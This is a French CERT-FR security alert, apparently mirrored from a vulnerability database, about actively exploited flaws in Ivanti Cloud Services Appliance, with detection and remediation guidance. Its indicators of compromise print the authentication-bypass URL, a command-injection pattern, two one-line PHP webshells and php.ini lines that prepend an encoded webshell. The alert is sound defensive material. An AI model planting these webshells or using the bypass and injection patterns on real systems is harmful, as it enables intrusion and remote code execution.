CERTFR-2024-ALE-013
Vulnerability from certfr_alerte
Ivanti a publié plusieurs avis de sécurité sur des vulnérabilités affectant CSA qui sont activement exploitées : * le 10 septembre 2024, Ivanti a publié un avis de sécurité concernant la vulnérabilité CVE-2024-8190 qui permet à un attaquant, authentifié en tant qu'administrateur, d'exécuter du code arbitraire à distance sur un équipement CSA ; * le 13 septembre 2024, l'éditeur a ajouté que cette vulnérabilité était activement exploitée dans le cadre d'attaques ciblées ; * le 16 septembre 2024, le CERT-FR a eu connaissance de codes d'exploitation publics pour la vulnérabilité CVE-2024-8190 ; * le 19 septembre 2024, Ivanti a publié un nouvel avis de sécurité affectant CSA. La vulnérabilité CVE-2024-8963 permet à un attaquant non authentifié de contourner l'authentification et d'obtenir les droits administrateur ; * le 8 octobre 2024, Ivanti a publié un nouvel avis de sécurité affectant les CSA versions 5.0.1 et antérieures. Les vulnérabilités CVE-2024-9379 et CVE-2024-9380, combinées à la vulnérabilité CVE-2024-8963 présente sur les CSA versions 4.6 antérieures au correctif 519, permettent d’exécuter du code arbitraire à distance ; * le 11 octobre 2024 l'éditeur Fortinet a publié un billet de blogue [1] détaillant les exploitations constatées lors d'une opération de réponse à incidents.
L'éditeur a précisé que les vulnérabilités CVE-2024-8190 et CVE-2024-8963 étaient activement exploitées et a connaissance d’un nombre limité d’exploitations des vulnérabilités CVE-2024-9379 et CVE-2024-9380, combinées à la vulnérabilité CVE-2024-8963 sur les CSA en versions antérieures à 5.0 uniquement.
Le CERT-FR a connaissance de plusieurs compromissions dans lesquelles ces vulnérabilités ont été exploitées.
Recherche de compromission
Des traces d’exploitation sont identifiables dans les journaux /var/log/messages-<date>.tar.gz
ou dans des journaux de reverse-proxy en privilégiant la période du 4 au 15 septembre 2024 :
1. requête HTTP GET vers l'URL /client/index.php%3F.php/gsb/users.php
(CVE-2024-8963). Les attaquants peuvent utiliser des moyens d’obscurcissement pour contourner ce motif de détection ;
2. suivie d'une requête HTTP POST vers l'URL /gsb/datetime.php
(CVE-2024-8190) ;
3. présence de PGPASSWORD
pouvant indiquer une manipulation de la base de donnée contenant les informations de connexion ;
4. présence d'une requête contenant tripwire --update ;
indiquant une injection de commandes au travers de la page reports.php
.
Dans /var/log/messages*
et /var/log/secure*
, des traces d’exécutions de commandes malveillantes peuvent être identifiées :
* base64 -d
* tripwire –-update ; <injection de commande>
L'attaquant peut également utiliser des webshells situées dans le dossier /opt/landesk
contenant uniquement l’une des deux lignes suivantes :
* <?php @eval($_REQUEST[<variable>]); ?>
* <?php system('/bin/sudo '. $_REQUEST[<variable>]);
Il existe également des combinaisons de ces deux lignes (sans le ?>
final, avec ou sans guillemet autour de la variable, etc.). Les dates de dernière modification et de création de ces fichiers peuvent avoir été manipulées.
De plus, des indicateurs de compromission peuvent parfois être observés à la fin du fichier /etc/php.ini
:
* allow_url_include = On
* auto_prepend_file = "data:;base64,<webshell encodé>"
Le CERT-FR recommande par ailleurs de chercher les indicateurs de compromission présentés dans l'article de Fortinet [1].
L'URL permettant d'exploiter la vulnérabilité CVE-2024-8963 a été massivement requêtée. Sa seule présence dans les journaux d'activité n'est donc pas nécessairement révélatrice d'une action malveillante. Il est néanmoins nécessaire de suivre les étapes 4 à 6 présentes dans la section Solution.
Solution
La version 5.0.2 de CSA corrige l'ensemble des vulnérabilités présentées. La version 4.6 n'est plus supportée par l'éditeur et ce dernier recommande de mettre à jour vers la version 5.0.2. L’éditeur recommande l’utilisation de deux interfaces réseau, en utilisant eth0
uniquement pour le réseau interne.
Si vous êtes en présence d'un CSA qui était en version 4.6 et accessible depuis Internet en septembre ou octobre 2024, il est impératif d’effectuer une recherche de traces d’exploitation de vulnérabilité sur l’équipement ou la machine virtuelle, ainsi que de tentatives de latéralisation.
En cas de compromission ou suspicion de compromission :
- isoler les équipements compromis du réseau et réaliser un gel de données (instantané pour les machines virtuelles, isolement de l’équipement s’il s’agit d’un équipement physique) à des fins d’investigations approfondies ;
- signaler l’événement auprès du CERT-FR en mettant en copie vos éventuels CSIRTs métier ;
- reconstruire la solution CSA en version 5.0.2 et son système d’exploitation sur lequel il repose à partir de source éditeur. L'attaquant peut déposer un implant qui ne sera pas supprimé avec la simple réinstallation de l'application ;
- réinitialiser tous les secrets de façon générale (mot de passe, certificat, etc.) configurés sur les équipements affectés ;
- réinitialiser tous les secrets d’authentification susceptibles d’avoir transités sur les équipements affectés (si applicable) ;
- vérifier que l'ensemble des utilisateurs du système sont légitimes ;
- rechercher toutes traces de latéralisation sur le reste du système d’information, notamment :
- en cherchant les connexions ou tentatives de connexion vers Internet depuis l'équipement compromis ;
- puis en cherchant ces adresses IP de destination pour vérifier si d’autres machines ont tenté une connexion ;
- en analysant les journaux des EDR ou les journaux Windows pour identifier des connexions depuis l'équipement compromis.
- identifier les comptes du domaine Active Directory qui seraient configurés sur l'équipement suspecté puis :
- vérifier l'activité réalisée à partir de ce compte ;
- réinitialiser les secrets associés à ces comptes afin d'éviter que l'attaquant ne puisse réutiliser ailleurs les identifiants éventuellement obtenus sur l'équipement.
Le CERT-FR vous recontactera si nécessaire pour le traitement de l’incident ou vous communiquera des éléments supplémentaires. En cas de suspicion de compromission, il est recommandé de consulter les bons réflexes en cas d'intrusion sur votre système d'information [2], ainsi que les fiches réflexe sur la compromission système [3] [4].
Une chaine d’exploitation complète est connue pour les produits Ivanti Cloud Services Appliance de versions antérieures à 5.0, notamment les versions 4.6 n’ayant pas appliqué le correctif 519. Les vulnérabilités CVE-2024-8190, CVE-2024-8963 et CVE-2024-9380 ont été exploitées avant la publication de ce correctif. Le CERT-FR n’a pas connaissance d’une chaine d’exploitation impactant les versions 5.0.x.
Vendor | Product | Description | ||
---|---|---|---|---|
Ivanti | Cloud Service Appliance (CSA) | Ivanti Cloud Services Appliance (CSA) versions antérieures à 5.0.2 |
Title | Publication Time | Tags | ||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
{ "$ref": "https://www.cert.ssi.gouv.fr/openapi.json", "affected_systems": [ { "description": "Ivanti Cloud Services Appliance (CSA) versions ant\u00e9rieures \u00e0 5.0.2", "product": { "name": "Cloud Service Appliance (CSA)", "vendor": { "name": "Ivanti", "scada": false } } } ], "affected_systems_content": "Une chaine d\u2019exploitation compl\u00e8te est connue pour les produits Ivanti Cloud Services Appliance de versions ant\u00e9rieures \u00e0 5.0, notamment les versions 4.6 n\u2019ayant pas appliqu\u00e9 le correctif 519.\nLes vuln\u00e9rabilit\u00e9s CVE-2024-8190, CVE-2024-8963 et CVE-2024-9380 ont \u00e9t\u00e9 exploit\u00e9es avant la publication de ce correctif.\nLe CERT-FR n\u2019a pas connaissance d\u2019une chaine d\u2019exploitation impactant les versions 5.0.x.", "closed_at": "2025-03-31", "content": "## Recherche de compromission\n\nDes traces d\u2019exploitation sont identifiables dans les journaux `/var/log/messages-\u003cdate\u003e.tar.gz` ou dans des journaux de reverse-proxy en privil\u00e9giant la p\u00e9riode du 4 au 15 septembre 2024 :\n1. requ\u00eate HTTP GET vers l\u0027URL `/client/index.php%3F.php/gsb/users.php` (CVE-2024-8963). Les attaquants peuvent utiliser des moyens d\u2019obscurcissement pour contourner ce motif de d\u00e9tection ; \n2. suivie d\u0027une requ\u00eate HTTP POST vers l\u0027URL `/gsb/datetime.php` (CVE-2024-8190) ;\n3. pr\u00e9sence de `PGPASSWORD` pouvant indiquer une manipulation de la base de donn\u00e9e contenant les informations de connexion ;\n4. pr\u00e9sence d\u0027une requ\u00eate contenant `tripwire --update ;` indiquant une injection de commandes au travers de la page `reports.php`.\n\nDans `/var/log/messages*` et `/var/log/secure*`, des traces d\u2019ex\u00e9cutions de commandes malveillantes peuvent \u00eatre identifi\u00e9es :\n* `base64 -d`\n* `tripwire \u2013-update ; \u003cinjection de commande\u003e`\n\nL\u0027attaquant peut \u00e9galement utiliser des *webshells* situ\u00e9es dans le dossier `/opt/landesk` contenant uniquement l\u2019une des deux lignes suivantes :\n* `\u003c?php @eval($_REQUEST[\u003cvariable\u003e]); ?\u003e`\n* `\u003c?php system(\u0027/bin/sudo \u0027. $_REQUEST[\u003cvariable\u003e]);`\n\nIl existe \u00e9galement des combinaisons de ces deux lignes (sans le `?\u003e` final, avec ou sans guillemet autour de la variable, etc.). Les dates de derni\u00e8re modification et de cr\u00e9ation de ces fichiers peuvent avoir \u00e9t\u00e9 manipul\u00e9es. \n\nDe plus, des indicateurs de compromission peuvent parfois \u00eatre observ\u00e9s \u00e0 la fin du fichier `/etc/php.ini` :\n* `allow_url_include = On`\n* `auto_prepend_file = \"data:;base64,\u003cwebshell encod\u00e9\u003e\"`\n\nLe CERT-FR recommande par ailleurs de chercher les indicateurs de compromission pr\u00e9sent\u00e9s dans l\u0027article de Fortinet [1].\n\nL\u0027URL permettant d\u0027exploiter la vuln\u00e9rabilit\u00e9 CVE-2024-8963 a \u00e9t\u00e9 massivement requ\u00eat\u00e9e. Sa seule pr\u00e9sence dans les journaux d\u0027activit\u00e9 n\u0027est donc pas n\u00e9cessairement r\u00e9v\u00e9latrice d\u0027une action malveillante. Il est n\u00e9anmoins n\u00e9cessaire de suivre les \u00e9tapes 4 \u00e0 6 pr\u00e9sentes dans la section Solution. \n\n## Solution \n\nLa version 5.0.2 de CSA corrige l\u0027ensemble des vuln\u00e9rabilit\u00e9s pr\u00e9sent\u00e9es. La version 4.6 n\u0027est plus support\u00e9e par l\u0027\u00e9diteur et ce dernier recommande de mettre \u00e0 jour vers la version 5.0.2. L\u2019\u00e9diteur recommande l\u2019utilisation de deux interfaces r\u00e9seau, en utilisant `eth0` uniquement pour le r\u00e9seau interne.\n\nSi vous \u00eates en pr\u00e9sence d\u0027un CSA qui \u00e9tait en version 4.6 et accessible depuis Internet en septembre ou octobre 2024, il est imp\u00e9ratif d\u2019effectuer une recherche de traces d\u2019exploitation de vuln\u00e9rabilit\u00e9 sur l\u2019\u00e9quipement ou la machine virtuelle, ainsi que de tentatives de lat\u00e9ralisation.\n\nEn cas de compromission ou suspicion de compromission :\n\n1. isoler les \u00e9quipements compromis du r\u00e9seau et r\u00e9aliser un gel de donn\u00e9es (instantan\u00e9 pour les machines virtuelles, isolement de l\u2019\u00e9quipement s\u2019il s\u2019agit d\u2019un \u00e9quipement physique) \u00e0 des fins d\u2019investigations approfondies ;\n2. signaler l\u2019\u00e9v\u00e9nement aupr\u00e8s du CERT-FR en mettant en copie vos \u00e9ventuels CSIRTs m\u00e9tier ; \n3. reconstruire la solution CSA en version 5.0.2 et son syst\u00e8me d\u2019exploitation sur lequel il repose \u00e0 partir de source \u00e9diteur. L\u0027attaquant peut d\u00e9poser un implant qui ne sera pas supprim\u00e9 avec la simple r\u00e9installation de l\u0027application ;\n4. r\u00e9initialiser tous les secrets de fa\u00e7on g\u00e9n\u00e9rale (mot de passe, certificat, etc.) configur\u00e9s sur les \u00e9quipements affect\u00e9s ; \n5. r\u00e9initialiser tous les secrets d\u2019authentification susceptibles d\u2019avoir transit\u00e9s sur les \u00e9quipements affect\u00e9s (si applicable) ;\n6. v\u00e9rifier que l\u0027ensemble des utilisateurs du syst\u00e8me sont l\u00e9gitimes ; \n7. rechercher toutes traces de lat\u00e9ralisation sur le reste du syst\u00e8me d\u2019information, notamment :\n * en cherchant les connexions ou tentatives de connexion vers Internet depuis l\u0027\u00e9quipement compromis ;\n * puis en cherchant ces adresses IP de destination pour v\u00e9rifier si d\u2019autres machines ont tent\u00e9 une connexion ;\n * en analysant les journaux des EDR ou les journaux Windows pour identifier des connexions depuis l\u0027\u00e9quipement compromis. \n8. identifier les comptes du domaine Active Directory qui seraient configur\u00e9s sur l\u0027\u00e9quipement suspect\u00e9 puis :\n * v\u00e9rifier l\u0027activit\u00e9 r\u00e9alis\u00e9e \u00e0 partir de ce compte ;\n * r\u00e9initialiser les secrets associ\u00e9s \u00e0 ces comptes afin d\u0027\u00e9viter que l\u0027attaquant ne puisse r\u00e9utiliser ailleurs les identifiants \u00e9ventuellement obtenus sur l\u0027\u00e9quipement.\n\nLe CERT-FR vous recontactera si n\u00e9cessaire pour le traitement de l\u2019incident ou vous communiquera des \u00e9l\u00e9ments suppl\u00e9mentaires. En cas de suspicion de compromission, il est recommand\u00e9 de consulter les [bons r\u00e9flexes en cas d\u0027intrusion sur votre syst\u00e8me d\u0027information](https://www.cert.ssi.gouv.fr/les-bons-reflexes-en-cas-dintrusion-sur-un-systeme-dinformation/) [2], ainsi que les fiches r\u00e9flexe sur la compromission syst\u00e8me [3] [4]. \n", "cves": [ { "name": "CVE-2024-9380", "url": "https://www.cve.org/CVERecord?id=CVE-2024-9380" }, { "name": "CVE-2024-8963", "url": "https://www.cve.org/CVERecord?id=CVE-2024-8963" }, { "name": "CVE-2024-8190", "url": "https://www.cve.org/CVERecord?id=CVE-2024-8190" } ], "initial_release_date": "2025-03-31T00:00:00", "last_revision_date": "2025-03-31T00:00:00", "links": [ { "title": "[2] Les bons r\u00e9flexes en cas d\u2019intrusion sur un syst\u00e8me d\u2019information", "url": "https://www.cert.ssi.gouv.fr/les-bons-reflexes-en-cas-dintrusion-sur-un-systeme-dinformation/" }, { "title": "[4] Fiche r\u00e9flexe Compromission syst\u00e8me - Endiguement", "url": "https://www.cert.ssi.gouv.fr/fiche/CERTFR-2024-RFX-006/" }, { "title": "[3]\u00a0Fiche r\u00e9flexe Compromission syst\u00e8me - Qualification", "url": "https://www.cert.ssi.gouv.fr/fiche/CERTFR-2024-RFX-005/" }, { "title": "Avis CERTFR-2024-AVI-0851 du 09 octobre 2024", "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0851/" }, { "title": "Bulletin d\u0027actualit\u00e9 CERTFR-2024-ACT-045 du 14 octobre 2024", "url": "https://www.cert.ssi.gouv.fr/actualite/CERTFR-2024-ACT-045/" }, { "title": "Avis CERTFR-2024-AVI-0796 du 20 septembre 2024", "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0796/" }, { "title": "[1] Billet de blogue de FortiGuard Labs Threat Research du 11 octobre 2024 ", "url": "https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa" } ], "reference": "CERTFR-2024-ALE-013", "revisions": [ { "description": " Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.", "revision_date": "2025-03-31T00:00:00.000000" }, { "description": "Version initiale", "revision_date": "2024-10-22T00:00:00.000000" }, { "description": "Correction d\u0027un marqueur pr\u00e9sent dans les fichiers de /var/log/", "revision_date": "2024-10-25T00:00:00.000000" } ], "risks": [ { "description": "Ex\u00e9cution de code arbitraire \u00e0 distance" }, { "description": "Contournement de la politique de s\u00e9curit\u00e9" } ], "summary": "Ivanti a publi\u00e9 plusieurs avis de s\u00e9curit\u00e9 sur des vuln\u00e9rabilit\u00e9s affectant CSA qui sont activement exploit\u00e9es :\n* le 10 septembre 2024, Ivanti a publi\u00e9 un avis de s\u00e9curit\u00e9 concernant la vuln\u00e9rabilit\u00e9 CVE-2024-8190 qui permet \u00e0 un attaquant, authentifi\u00e9 en tant qu\u0027administrateur, d\u0027ex\u00e9cuter du code arbitraire \u00e0 distance sur un \u00e9quipement CSA ;\n* le 13 septembre 2024, l\u0027\u00e9diteur a ajout\u00e9 que cette vuln\u00e9rabilit\u00e9 \u00e9tait activement exploit\u00e9e dans le cadre d\u0027attaques cibl\u00e9es ;\n* le 16 septembre 2024, le CERT-FR a eu connaissance de codes d\u0027exploitation publics pour la vuln\u00e9rabilit\u00e9 CVE-2024-8190 ;\n* le 19 septembre 2024, Ivanti a publi\u00e9 un nouvel avis de s\u00e9curit\u00e9 affectant CSA. La vuln\u00e9rabilit\u00e9 CVE-2024-8963 permet \u00e0 un attaquant non authentifi\u00e9 de contourner l\u0027authentification et d\u0027obtenir les droits administrateur ;\n* le 8 octobre 2024, Ivanti a publi\u00e9 un nouvel avis de s\u00e9curit\u00e9 affectant les CSA versions 5.0.1 et ant\u00e9rieures. Les vuln\u00e9rabilit\u00e9s CVE-2024-9379 et CVE-2024-9380, combin\u00e9es \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2024-8963 pr\u00e9sente sur les CSA versions 4.6 ant\u00e9rieures au correctif 519, permettent d\u2019ex\u00e9cuter du code arbitraire \u00e0 distance ;\n* le 11 octobre 2024 l\u0027\u00e9diteur Fortinet a publi\u00e9 un billet de blogue [1] d\u00e9taillant les exploitations constat\u00e9es lors d\u0027une op\u00e9ration de r\u00e9ponse \u00e0 incidents.\n \nL\u0027\u00e9diteur a pr\u00e9cis\u00e9 que les vuln\u00e9rabilit\u00e9s CVE-2024-8190 et CVE-2024-8963 \u00e9taient activement exploit\u00e9es et a connaissance d\u2019un nombre limit\u00e9 d\u2019exploitations des vuln\u00e9rabilit\u00e9s CVE-2024-9379 et CVE-2024-9380, combin\u00e9es \u00e0 la vuln\u00e9rabilit\u00e9 CVE-2024-8963 sur les CSA en versions ant\u00e9rieures \u00e0 5.0 uniquement. \n\n**Le CERT-FR a connaissance de plusieurs compromissions dans lesquelles ces vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 exploit\u00e9es.**", "title": "Exploitations de vuln\u00e9rabilit\u00e9s dans Ivanti Cloud Services Appliance (CSA)", "vendor_advisories": [ { "published_at": "2024-10-10", "title": "Bulletin de s\u00e9curit\u00e9 Ivanti", "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" }, { "published_at": "2024-09-19", "title": "Bulletin de s\u00e9curit\u00e9 Ivanti", "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US" }, { "published_at": "2024-09-10", "title": "Bulletin de s\u00e9curit\u00e9 Ivanti", "url": "https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US" } ] }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.